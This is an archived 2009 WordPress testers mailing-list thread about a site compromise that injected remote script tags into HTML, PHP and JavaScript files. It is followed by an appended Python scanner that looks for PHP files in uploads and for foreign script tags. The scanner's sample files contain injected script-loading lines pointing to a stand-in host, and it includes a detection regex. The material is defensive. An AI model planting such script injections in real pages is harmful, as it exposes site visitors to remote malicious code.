[wp-testers] 2.8.6 Beta1

Tom Klingenberg tklingenberg at lastflood.net
Fri Nov 20 10:00:58 UTC 2009


Scan your upload folder for .php files. You might find an attacker script
in there.

tom

On 20.11.2009, 10:57, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:

> It appears to have inserted that after </head> in all the .html and .php
> files it could find, and the document.write in all .js's.
>
> I don't think it's a WordPress vulnerability, as it's affecting the files
> rather than actual posts..
>
> I'd be tempted to suggest a full virus scan of your computer..
> possibility it's stealing your FTP credentials?
>
> Any other websites on that account affected? What about files outside of
> WordPress?
>
> On Fri, 20 Nov 2009 20:53:10 +1100, Naudirz <naudirz at gmail.com> wrote:
>
>> Here is more info
>>
>> Search "northstarsocal.com" (98 hits in 98 files)
>>
>>
>>
>> On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
>>
>>> What are the symptoms of the hack?
>>>
>>> Install something to log all post requests ASAP, to gather data if it's
>>> a new vulnerability: http://www.village-idiot.org/post-logger
>>>
>>> You'd not by any chance be on MediaTemple servers would you? *(Who's
>>> your webhost)
>>>
>>>
>>> On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>
>>>> OK, cause my 2.9 nightly gets hacked every day..
>>>> in that case it's a new security bug..
>>>> I've wasted every file/folder and done a fresh installation, everything
>>>> except the db is new, also passwd is changed on everything except db.
>>>> No extra user is in db.
>>>>
>>>> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
>>>>
>>>>> Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
>>>>>
>>>>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>>>
>>>>>> Hi!
>>>>>>
>>>>>> Is this fix also in 2.9 nightlybuild?
>>>>>>
>>>>>> /Phibrz
>>>>>>
>>>>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <ryan at boren.nu> wrote:
>>>>>>
>>>>>>> http://wordpress.org/wordpress-2.8.6-beta1.zip
>>>>>>>
>>>>>>> Fixes these two security issues:
>>>>>>>
>>>>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
>>>>>>>
>>>>>>> A logged in user with author privileges is required to exploit. Press
>>>>>>> This and uploads need testing.
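
The two checks suggested in this thread (looking for .php files in the upload folder, and finding the injected `<script src=...>` / `document.write` lines across the site files) can be scripted as below. This is an added example, not code from the thread or from WordPress; the default `wp-content/uploads` path, the suffix lists, the function names and the `injected.example` host in the constructed sample tree are assumptions, and matching PHP-variant suffixes goes slightly beyond the ".php" named above.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Assumed names and defaults (not from the thread): suffix lists, uploads path.
PHP_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
TEXT_SUFFIXES = {".html", ".htm", ".php", ".js", ".xml"}
# <script src=URL>, bare or inside document.write('...'), with an absolute URL.
REMOTE_SCRIPT = re.compile(r"""<script\s+src=\s*["']?(https?://[^\s"'>]+)""", re.I)


def find_php_in_uploads(site_root, uploads_rel="wp-content/uploads"):
    """List PHP-like files under the upload folder, where none should exist."""
    uploads = Path(site_root) / uploads_rel
    if not uploads.is_dir():
        return []
    return sorted(p.relative_to(site_root).as_posix()
                  for p in uploads.rglob("*")
                  if p.is_file() and p.suffix.lower() in PHP_SUFFIXES)


def find_remote_script_tags(site_root, allowed_hosts=()):
    """Return (file, line, host) for each script tag loading from a host
    that is not in allowed_hosts (e.g. the site's own domain or its CDN)."""
    hits = []
    for path in sorted(Path(site_root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        # Search the whole file so a tag split across lines is still found.
        for m in REMOTE_SCRIPT.finditer(text):
            host = (urlparse(m.group(1)).hostname or "").lower()
            if host not in allowed_hosts:
                lineno = text.count("\n", 0, m.start()) + 1
                hits.append((path.relative_to(site_root).as_posix(), lineno, host))
    return hits


def build_sample_site(root):
    """Constructed sample tree: two tampered files, one clean file, and one
    unexpected PHP file in the upload folder."""
    files = {
        "readme.html": "<html><head></head>\n"
                       "<script src=http://injected.example/x.php></script><body>\n"
                       "</body></html>\n",
        "wp-includes/js/autosave.js": "var autosave = 1;\n"
            "document.write('<script src= http://injected.example/x.php ><\\/script>');\n",
        "wp-includes/js/clean.js": "var ok = true;\n",
        "wp-content/uploads/2009/11/photo.jpg": "placeholder, not a real image\n",
        "wp-content/uploads/2009/11/gallery.php": "<?php /* placeholder */ ?>\n",
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        for rel in find_php_in_uploads(tmp):
            print("PHP in uploads:", rel)
        for rel, lineno, host in find_remote_script_tags(tmp):
            print(f"remote script: {rel}:{lineno} -> {host}")
```

Run it against a downloaded copy of the site and pass the site's own hostnames as `allowed_hosts` to cut down on legitimate matches.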

